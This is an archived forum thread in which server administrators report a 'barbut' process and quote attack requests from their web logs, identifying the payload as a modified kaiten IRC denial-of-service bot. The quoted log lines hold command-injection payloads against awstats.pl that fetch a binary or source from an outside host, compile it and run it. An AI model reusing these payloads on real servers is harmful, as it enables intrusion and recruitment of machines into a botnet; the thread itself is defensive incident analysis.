Re: barbut process using 100% cpu and connecting - Firewalls

This is a discussion on Re: barbut process using 100% cpu and connecting - Firewalls ; A long gap since this post, but I've just noticed "barbut" in our web server logs, googled, and found nothing but this query: On Jul 16, 6:15pm Jens Hoffman wrote: > krzysiek schrieb: > > there was a process called ...

+ Reply to Thread
Results 1 to 3 of 3

Thread: Re: barbut process using 100% cpu and connecting

  1. Re: barbut process using 100% cpu and connecting

    A long gap since this post, but I've just noticed "barbut" in our web
    server logs, googled, and found nothing but this query:

    On Jul 16, 6:15pm Jens Hoffman wrote:

    > krzysiek schrieb:


    > > there was a process called "barbut" (2 of them) using 49,2% CPU time
    > > each :O
    > > meanwhile netstat showed established connections to 195.73.177.146:666
    > > + several waiting.

    > Some host in .nl.
    > > I have no idea where did this process come from. Any clues?

    > I don't know about you, but I would take the machine off the net and
    > try to understand what happened.



    I hope the original poster did that - here's the "barbut" occurrence in
    our apache log:

    GET /awstats.pl?configdir=|echo;cd%20/tmp;wget%20217.79.176.126/barbut;chmod%20755%20barbut;./barbut;
    echo| HTTP/1.1

    (there are four attempts, trying different paths to awstats.pl)

    I did the wget, and it's a 30KB ELF executable. 'nm' shows such things as
    'flooders', 'getspoofs', 'changeservers' ... I don't think I'll run it ;-)

    Googling for some of those names finds this is probably the source code:

    http://packetstormsecurity.nl/irc/kaiten.c

    The comments start:

    "This is a IRC based distributed denial of service client. It connects
    to the server specified below and accepts commands via the channel
    specified."

    Hope this was useful,
    A.


  2. Re: barbut process using 100% cpu and connecting

    On 19 Nov, 10:03, "A" wrote:
    > Googling for some of those names finds this is probably the source code:
    >
    > http://packetstormsecurity.nl/irc/kaiten.c


    I've found similar requests in yesterdays log (19/Nov/2007:20:02:53
    +0100)
    "GET ?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f
    barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./
    barbut ; HTTP/1.1"

    W.r.t. the sources mentioned above, barbut.c has been changed,
    including the following differences:

    * The CHAN (channel to join) changed from "#whatever" to "#whatever1"
    * The server list has been replaced by the single entry
    "217.79.176.126"
    * The initial connection was has changed from port 6667 to port 113
    * The "run command" macro has changed from "SH " to "ZK "
    * The MODE sent by func _376 has changed from "MODE %s -xi" to "MODE
    %s +iwx"

    That didn't apparently succeed, so I don't know who are the victims...

  3. Re: barbut process using 100% cpu and connecting

    On Nov 20, 1:46 am, ale2007 wrote:
    > On 19 Nov, 10:03, "A" wrote:
    >
    > > Googling for some of those names finds this is probably the source code:

    >
    > > http://packetstormsecurity.nl/irc/kaiten.c

    >
    > I've found similar requests in yesterdays log (19/Nov/2007:20:02:53
    > +0100)
    > "GET ?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f
    > barbut;wgethttp://crekom.com/barbut.c;gccbarbut.c -o barbut;./
    > barbut ; HTTP/1.1"
    >
    > W.r.t. the sources mentioned above, barbut.c has been changed,
    > including the following differences:
    >
    > * The CHAN (channel to join) changed from "#whatever" to "#whatever1"
    > * The server list has been replaced by the single entry
    > "217.79.176.126"
    > * The initial connection was has changed from port 6667 to port 113
    > * The "run command" macro has changed from "SH " to "ZK "
    > * The MODE sent by func _376 has changed from "MODE %s -xi" to "MODE
    > %s +iwx"
    >
    > That didn't apparently succeed, so I don't know who are the victims...


    I found the same connection to my Imail server and Sophos posted this
    a few minutes ago.

    http://www.sophos.com/security/analy...ojkaitenw.html

+ Reply to Thread